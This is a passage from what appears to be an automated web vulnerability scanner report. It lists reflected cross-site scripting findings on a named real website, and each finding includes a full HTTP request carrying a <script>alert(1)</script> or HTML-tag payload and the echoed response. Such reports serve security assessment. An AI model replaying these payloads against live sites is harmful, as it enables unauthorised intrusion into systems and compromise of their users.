<p>The requested URL /detail/45/themes/kosmos9cca9<script>alert(1)</script>f29d711b862/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3225. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 26084<script>alert(1)</script>d28f90ad726 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images26084<script>alert(1)</script>d28f90ad726/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images26084<script>alert(1)</script>d28f90ad726/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3226. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6a812<script>alert(1)</script>76b2b24e5ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating6a812<script>alert(1)</script>76b2b24e5ac/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating6a812<script>alert(1)</script>76b2b24e5ac/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3227. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cb0ef<script>alert(1)</script>7ae5ac18677 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/search.phpcb0ef<script>alert(1)</script>7ae5ac18677?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.phpcb0ef<script>alert(1)</script>7ae5ac18677?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3228. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload db9e2<a>70d1329c5b3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchdb9e2<a>70d1329c5b3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchdb9e2<a>70d1329c5b3&opt=2 was not found on this server.</p>
...[SNIP]...

2.3229. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 73bc4<a>de6bee5889c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...73bc4<a>de6bee5889c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...73bc4<a>de6bee5889c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3230. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9fe3c<script>alert(1)</script>71a9cc9b5e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9fe3c<script>alert(1)</script>71a9cc9b5e5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9fe3c<script>alert(1)</script>71a9cc9b5e5=1 was not found on this server.</p>
...[SNIP]...

2.3231. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5780b<a>6f7552b5985 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25780b<a>6f7552b5985 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25780b<a>6f7552b5985 was not found on this server.</p>
...[SNIP]...

2.3232. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dfed9<script>alert(1)</script>e9102e10691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildfed9<script>alert(1)</script>e9102e10691/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildfed9<script>alert(1)</script>e9102e10691/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3233. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15491<script>alert(1)</script>5c2e804eb86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4515491<script>alert(1)</script>5c2e804eb86/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4515491<script>alert(1)</script>5c2e804eb86/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3234. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61f43<script>alert(1)</script>52e2d80c88a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes61f43<script>alert(1)</script>52e2d80c88a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes61f43<script>alert(1)</script>52e2d80c88a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3235. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 99d42<script>alert(1)</script>69b57fe93cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos99d42<script>alert(1)</script>69b57fe93cc/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos99d42<script>alert(1)</script>69b57fe93cc/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3236. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 91ff8<script>alert(1)</script>45d431b546 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images91ff8<script>alert(1)</script>45d431b546/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images91ff8<script>alert(1)</script>45d431b546/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3237. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8caf9<script>alert(1)</script>abdc9463f28 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/search.php8caf9<script>alert(1)</script>abdc9463f28?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php8caf9<script>alert(1)</script>abdc9463f28?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3238. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 27a1a<a>bb3276ec124 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search27a1a<a>bb3276ec124&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search27a1a<a>bb3276ec124&opt=2 was not found on this server.</p>
...[SNIP]...

2.3239. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c9aac<a>74838f2607f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...c9aac<a>74838f2607f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...c9aac<a>74838f2607f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3240. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 645a2<script>alert(1)</script>95e64a94e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&645a2<script>alert(1)</script>95e64a94e99=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&645a2<script>alert(1)</script>95e64a94e99=1 was not found on this server.</p>
...[SNIP]...

2.3241. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 69806<a>3d8c6181e26 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=269806<a>3d8c6181e26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=269806<a>3d8c6181e26 was not found on this server.</p>
...[SNIP]...

2.3242. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9baa7<script>alert(1)</script>a1787707a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9baa7<script>alert(1)</script>a1787707a3/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
